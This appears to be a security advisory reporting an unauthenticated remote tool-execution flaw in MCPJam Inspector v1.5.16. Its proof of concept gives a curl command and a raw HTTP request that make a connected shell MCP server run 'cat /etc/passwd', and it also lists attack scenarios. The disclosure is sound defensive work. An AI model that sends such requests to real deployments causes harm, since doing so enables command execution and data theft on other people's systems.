https://github.com/MCPJam/inspector/blob/eaad8c8e61f1a864eb103900d36e74b230e1aceb/mcpjam-inspector/server/middleware/session-auth.ts#L45\n\ntypescriptconst UNPROTECTED_PREFIXES = [\n   ...\n  \"/api/mcp/adapter-http/\", // HTTP adapter for tunneled MCP clients - auth via URL secrecy\n  \"/api/mcp/manager-http/\", // HTTP manager for tunneled MCP clients - auth via URL secrecy\n];\n\n```\n\nThese endpoints accept JSON-RPC requests and forward them directly to connected MCP servers without any authentication checks (see server/routes/mcp/http-adapters.ts, lines 149-159):\n\n```typescript\n// https://github.com/MCPJam/inspector/blob/eaad8c8e61f1a864eb103900d36e74b230e1aceb/mcpjam-inspector/server/routes/mcp/http-adapters.ts#L149\n\ntypescriptconst response = await handleJsonRpc(\n  normalizedServerId,\n  body as any,\n  clientManager,\n  mode,\n);\nreturn c.json(response);\n\n```\n\nSince MCPJam Inspector binds to `0.0.0.0` by default, its HTTP APIs are remotely reachable. An attacker requires:\n\n* Network connectivity to MCPJam Inspector (local network, Docker exposed port, or HOSTED_MODE deployment)\n* Knowledge or enumeration of a valid `serverId` (common values: \"local\", \"default\", \"asana\", \"github\", \"notion\")\n\n**No authentication, authorization, or request validation is performed.**\n\n### PoC\nRun MCPJam using below command:\n\n```bash\nnpx @mcpjam/inspector@latest\n```\n\nThen Install an MCP server allowing to run system command. I used the following MCP server as an example which allows running system commands: [[mac-shell-mcp](https://github.com/cfdude/mac-shell-mcp)](https://github.com/cfdude/mac-shell-mcp).\n\nYou can invoke this MCP server through MCPJam directly without authentication through the following HTTP request. Below is the curl request, and notice that it doesn't require any authentication or the authorization bearer token in the header:\n\n```bash\ncurl --path-as-is -i -s -k -X POST \\\n  -H 'Host: 127.0.0.1:6274' \\\n  -H 'Content-Type: application/json' \\\n  -d '{\n  \"jsonrpc\": \"2.0\",\n  \"id\": 2,\n  \"method\": \"tools/call\",\n  \"params\": {\n    \"name\": \"execute_command\",\n    \"arguments\": {\n      \"command\": \"cat\",\n      \"args\": [\"/etc/passwd\"]\n    }\n  }\n}' \\\n  'http://127.0.0.1:6274/api/mcp/adapter-http/shell-mcp'\n\n```\n\n\n\n\n\n\n\nYou can also use Burp Proxy to send the below request directly:\n\n\n```http\nPOST /api/mcp/adapter-http/shell-mcp HTTP/1.1\nHost: 127.0.0.1:6274\nContent-Type: application/json\nContent-Length: 195\n\n{\n    \"jsonrpc\": \"2.0\",\n    \"id\": 2,\n    \"method\": \"tools/call\",\n    \"params\": {\n      \"name\": \"execute_command\",\n      \"arguments\": {\"command\": \"cat\",\n\"args\":[\" /etc/passwd\"]}\n    }\n  }\n\n\n```\n\n\n\n\n\nThis issue was found on version `v1.5.16`\n\n\n\n\n\n### Impact\n\n\nThis vulnerability allows unauthorized remote attackers to execute arbitrary MCP tools without authentication, leading to complete compromise of the system when shell-enabled MCP servers are connected. The impact severity depends on the capabilities of the connected MCP servers:\n\n* **Unauthorized Tool Execution:** Attackers can invoke any MCP tool exposed by connected servers without authentication, bypassing all authorization controls.\n* **Data Exfiltration:** Unauthorized access to sensitive data through MCP resource reads, database queries, or file system operations.\n* **Remote Code Execution (RCE):** Direct system command execution through MCP servers like mac-shell-mcp, filesystem-mcp, or custom servers with command execution capabilities.\n* **Privilege Escalation:** If MCPJam Inspector runs with elevated privileges, attackers inherit those privileges for command execution.\n\n### Attack Scenarios:\n\n* **Local Network Attack:**  Attacker on the same LAN (corporate network, coffee shop WiFi, shared workspace) can directly access exposed MCPJam endpoints.\n* **Cloud Deployment Attack:** HOSTED_MODE deployments without proper network isolation are accessible from the internet.\n* **Docker Misconfiguration:**  Users running docker run -p 6274:6274 expose the vulnerability to anyone who can reach the host machine.\n", "creation_timestamp": "2026-06-12T18:31:30.000000Z"}]}